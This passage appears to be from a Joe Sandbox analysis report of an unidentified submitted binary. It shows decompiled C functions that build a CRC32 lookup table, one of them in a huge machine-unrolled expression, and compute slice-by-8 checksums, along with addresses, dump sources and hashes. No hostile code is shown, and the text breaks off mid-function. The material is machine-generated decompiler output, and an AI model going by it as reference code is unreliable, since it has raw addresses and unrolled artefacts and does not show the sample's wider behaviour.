                              					 *(0x4236c0 + _t72 * 4) =  !((( !((( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 
0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ 
_t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 
0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ 
_t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 
0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ 
_t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 
0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001;
                              					_t72 = _t72 + 1;
                              				} while (_t72 < 0x100);
                              				while(_t72 < 0x800) {
                              					_t38 =  *(0x4232c0 + _t72 * 4);
                              					_t72 = _t72 + 1;
                              					 *(0x4236bc + _t72 * 4) = _t38 >> 0x00000008 ^  *(0x4236c0 + (_t38 & 0x000000ff) * 4);
                              				}
                              				 *0x42333c = 0x418fd0;
                              				_t37 = E00411420();
                              				if(_t37 == 0) {
                              					 *0x42333c = 0x418ef0;
                              					return _t37;
                              				}
                              				return _t37;
                              			}
                              0x004133d0
                              0x004133d2
                              0x00413460
                              0x00413467
                              0x00413468
                              0x0041347a
                              0x00413480
                              0x00413499
                              0x0041349a
                              0x004134a1
                              0x004134a9
                              0x004134b3
                              0x004134ba
                              0x004134bc
                              0x00000000
                              0x004134bc
                              0x004134c6

                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 951ce894d9222124d4953917d4d44c2f3af61f07f2abcd4f63f3fcd2ee4f65ae
                              • Instruction ID: b54c2cd6cfa36051406bb29028bc26d5c271240bfac9ba2f52dccebc7510b76a
                              • Opcode Fuzzy Hash: 951ce894d9222124d4953917d4d44c2f3af61f07f2abcd4f63f3fcd2ee4f65ae
                              • Instruction Fuzzy Hash: 52214F3E370D0607A71C8B69AD336B921D2E38430A7C8A03DE68BC53D1EE6CD595860D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00418EF1(signed char __ecx, signed int __edx, intOrPtr _a8, intOrPtr _a12) {
                              				signed char _t42;
                              				signed int _t44;
                              				signed int _t50;
                              				signed int _t51;
                              				unsigned int _t59;
                              				signed char _t60;
                              				signed int _t62;
                              				void* _t63;
                              				intOrPtr _t65;
                              				intOrPtr _t67;
                              				signed int _t69;
                              				signed int _t73;
                              				signed int _t83;
                              				intOrPtr _t86;
                              
                              				_t62 = __edx;
                              				_t42 = __ecx;
                              				_t65 = _a8;
                              				_t86 = _a12;
                              				if(_t65 != 0) {
                              					while((_t62 & 0x00000007) != 0) {
                              						_t83 =  *_t62 & 0x000000ff;
                              						_t62 = _t62 + 1;
                              						_t42 = _t42 >> 0x00000008 ^  *(_t86 + (_t83 ^ _t42 & 0x000000ff) * 4);
                              						_t65 = _t65 - 1;
                              						if(_t65 != 0) {
                              							continue;
                              						}
                              						break;
                              					}
                              					if(_t65 >= 0x10) {
                              						_t67 = _t65 + _t62;
                              						_a8 = _t67;
                              						_t69 = _t67 - 0x00000008 & 0xfffffff8;
                              						_t63 = _t62 - _t69;
                              						_t44 = _t42 ^  *(_t63 + _t69);
                              						_t59 =  *(_t63 + _t69 + 4);
                              						do {
                              							_t50 = _t59 & 0x000000ff;
                              							_t51 = _t59 & 0x000000ff;
                              							_t60 = _t59 >> 0x10;
                              							_t59 =  *(_t63 + _t69 + 0xc);
                              							_t44 =  *(_t86 + 0x1000 + (_t44 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t63 + _t69 + 8) ^  *(_t86 + 0xc00 + _t50 * 4) ^  *(_t86 + 0x800 + _t51 * 4) ^  *(_t86 + 0x400 + (_t60 & 0x000000ff) * 4) ^  *(_t86 + (_t60 & 0x000000ff) * 4) ^  *(_t86 + 0x1c00 + (_t44 & 0x000000ff) * 4) ^  *(_t86 + 0x1800 + (_t44 & 0x000000ff) * 4) ^  *(_t86 + 0x1400 + (_t44 >> 0x00000010 & 0x000000ff) * 4);
                              							_t63 = _t63 + 8;
                              						} while (_t63 != 0);
                              						_t42 = _t44 ^  *(_t63 + _t69);
                              						_t62 = _t69;
                              						_t65 = _a8 - _t62;
                              						L7:
                              						while(_t65 != 0) {
                              							_t73 =  *_t62 & 0x000000ff;
                              							_t62 = _t62 + 1;
                              							_t42 = _t42 >> 0x00000008 ^  *(_t86 + (_t73 ^ _t42 & 0x000000ff) * 4);
                              							_t65 = _t65 - 1;
                              						}
                              						return _t42;
                              					}
                              				}
                              				goto L7;
                              			}
                              0x00418ef1
                              0x00418ef4
                              0x00418ef6
                              0x00418efa
                              0x00418f00
                              0x00418f06
                              0x00418f0e
                              0x00418f11
                              0x00418f1a
                              0x00418f1e
                              0x00418f1f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00418f1f
                              0x00418f24
                              0x00418f2a
                              0x00418f2c
                              0x00418f33
                              0x00418f36
                              0x00418f38
                              0x00418f3b
                              0x00418f40
                              0x00418f44
                              0x00418f4e
                              0x00418f58
                              0x00418f6f
                              0x00418f9b
                              0x00418f9d
                              0x00418f9d
                              0x00418fa2
                              0x00418fa5
                              0x00418fab
                              0x00000000
                              0x00418fad
                              0x00418fb1
                              0x00418fb4
                              0x00418fbd
                              0x00418fc1
                              0x00418fc1
                              0x00418fc8
                              0x00418fc8
                              0x00418f24
                              0x00000000

                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                              • Instruction ID: d8f843b74cbd450328ce6fa4395b1e87caa1541ea2f4e00bece6a97874f35350
                              • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                              • Instruction Fuzzy Hash: 9F21D7329046254BCB42DE6EE4845A7F392FBC437AF23472BED8467290C638E855D6A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00418FCB(signed char __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
                              				signed char _t39;
                              				signed int _t41;
                              				signed int _t63;
                              				void* _t64;
                              				intOrPtr _t65;
                              				intOrPtr _t66;
                              				signed int _t68;
                              				signed int _t70;
                              				signed int _t74;
                              				intOrPtr _t76;
                              
                              				_t63 = __edx;
                              				_t39 = __ecx;
                              				_t65 = _a4;
                              				_t76 = _a8;
                              				if(_t65 != 0) {
                              					while((_t63 & 0x00000007) != 0) {
                              						_t74 =  *_t63 & 0x000000ff;
                              						_t63 = _t63 + 1;
                              						_t39 = _t39 >> 0x00000008 ^  *(_t76 + (_t74 ^ _t39 & 0x000000ff) * 4);
                              						_t65 = _t65 - 1;
                              						if(_t65 != 0) {
                              							continue;
                              						}
                              						break;
                              					}
                              					if(_t65 >= 0x10) {
                              						_t66 = _t65 + _t63;
                              						_a4 = _t66;
                              						_t68 = _t66 - 0x00000008 & 0xfffffff8;
                              						_t64 = _t63 - _t68;
                              						_t41 = _t39 ^  *(_t64 + _t68);
                              						do {
